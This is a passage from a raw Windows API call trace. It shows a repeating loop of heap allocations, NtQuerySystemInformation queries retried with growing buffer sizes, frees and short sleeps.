Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.711] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.712] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.718] Sleep (dwMilliseconds=0x110) [0212.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.755] Sleep (dwMilliseconds=0x110) [0212.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.801] Sleep (dwMilliseconds=0x110) [0212.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.820] Sleep (dwMilliseconds=0x110) [0212.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.866] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.867] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.867] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.876] Sleep (dwMilliseconds=0x110) [0212.918] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.918] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.918] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.923] Sleep (dwMilliseconds=0x110) [0212.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.977] Sleep (dwMilliseconds=0x110) [0212.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.993] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.993] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.993] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.993] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.994] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.994] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.994] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.995] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.998] Sleep (dwMilliseconds=0x110) [0213.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.025] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.025] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.026] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.032] Sleep (dwMilliseconds=0x110) [0213.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.056] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.056] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.057] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.057] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.057] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.058] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.058] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.059] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.061] Sleep (dwMilliseconds=0x110) [0213.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.081] Sleep (dwMilliseconds=0x110) [0213.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.103] Sleep (dwMilliseconds=0x110) [0213.119] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.120] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.126] Sleep (dwMilliseconds=0x110) [0213.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.150] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.150] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.150] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.151] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.151] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.162] Sleep (dwMilliseconds=0x110) [0213.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.252] HeapFree (in: hHeap=0x2560000, 